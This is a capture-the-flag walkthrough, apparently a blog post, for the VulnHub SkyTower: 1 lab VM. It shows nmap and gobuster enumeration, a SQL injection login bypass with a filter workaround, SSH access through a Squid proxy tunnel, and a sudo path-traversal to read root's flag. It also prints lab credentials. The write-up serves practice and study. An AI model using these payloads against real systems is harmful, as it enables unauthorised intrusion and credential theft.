VulnHub: SkyTower: 1

6 min readApr 26, 2021


Initial foothold

  1. Network discovery
nmap -sn

My target is

2.Port scan

nmap -Pn -Pn -p1000-

There’s 1 filtered port (22) and 2 open ports (80 and 3128).

3. OS and service scan

nmap -A -p22,80,3128

4. Vuln scan

nmap --script vuln -p22,80,3128

There’s ‘login.php’ on the HTTP service.

Service Enumeration

There’re 3 services

  • 22/tcp filtered ssh
  1. Connect

When I tried to connect, it froze.

  • 80/tcp open http Apache httpd 2.2.22 ((Debian))
  1. Nikto scan

2. Directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi,bak -q

3. Access HTTP site

View page source

4. SQL injection

Since It’s a login form. I will try SQL injection.


Intercept w/ Burp Suite

Send to the Repeater.

Starting w/ this input:

1' or 1=1--

Use decoder to encode for URL

Copy to both email and password parameters. There’s am error mesasge

Take a closer look

There’re 2 problems that I’m facing:

  1. Filter

In my experience, error-based SQLi will show a message like this:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 

In this case, it’s a weird error message, ‘11’.
Because of this, I suspect that there’s a filter in the code.

2. comment

I supplied ’--’ as acomment to suppress the password field, but the error message still shows that there’s some handling w/ the password field. I need to change it.

To bypass the filter problem, I changed ‘or’ to ‘||’

1' || 1=1--

Take a closer look at the error message, the filter problem should be gone for now.

1' || 1=1-- - -> failed1' || 1=1--+ -> failed1' || 1=1# -> succeeded

I got a credential, john : hereisjohn.

  • 3128/tcp open http-proxy Squid http proxy 3.1.20

Access w/ browser. It’s a proxy service.


There’s only SSH service left and proxy service. I will try to use a proxy tunnel and access SSH via the created tunnel

  1. To create proxy tunnel, use this command:
proxytunnel -p <target ip>:<proxy port> -d<target port> -a <our port>proxytunnel -p -d -a 1234

2. Connect to SSH

ssh john@ -p 1234

I could connect, but the connection was cut immediately.

3. Working around SSH to get the shell

  • SSH shellshock
ssh john@ -p 1234 '() { :;}; /bin/bash'
  • Just call /bin/bash
ssh john@ -p 1234 /bin/bashid

4. TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

This machine doesn't have python.

Try for another one, echo.

which echoecho os.system('/bin/bash')

My connection was cut again. I’m tired of this, so I have to work around.

My first suspicion is ‘.bashrc’.

ls -la

There’s the ‘.bashrc’ file.

Edit it

nano .bashrc

I cannot edit it.

Read it

cat .bashrc

There’s an ‘exit’ command in the file.

Just remove it

rm .bashrc

Login again. This time, I don't have to call /bin/bash.

ssh john@ -p 1234

I’m good to go.

Privilege Escalation

  1. Verify users
cat /etc/passwd

There’re 3 users on this machine: john, sara, and william.

2. Explore directories

I explored as listed


Finally, I found the ‘login.php’ in /var/www/html. Here are the commands

cd /var/www/htmlls -lacat login.php

I got MySQL credential

3. Verify sudo

sudo -l

John cannot run sudo command.

4. Access mysql

Verify version

mysql -V

Login to mysql

mysql -uroot -proot

List database

use mysql;show databases;

There’s SkyTech.

Show tables in SkyTech

use SkyTech;show tables;

There’s login table.

Retrieve data

select * from login

I got the other 2 users’ credentials, sara and william.

5. Login as sara

su sara

The connection was cut immediately like john’s shell.

Remove .bashrc

ssh sara@ -p 1234 /bin/bashrm .bashrc

Login again

ssh sara@ -p 1234

6. sara’s sudo

Verify sudo

sudo -l

This user can use /bin/cat /account/*/

Verify path

ls -la /

There’s /accounts directory.

Use wildcard to access /root

sudo /bin/cat /accounts/../root/flag.txt

Now I got root password

Login as root

su -password: theskytower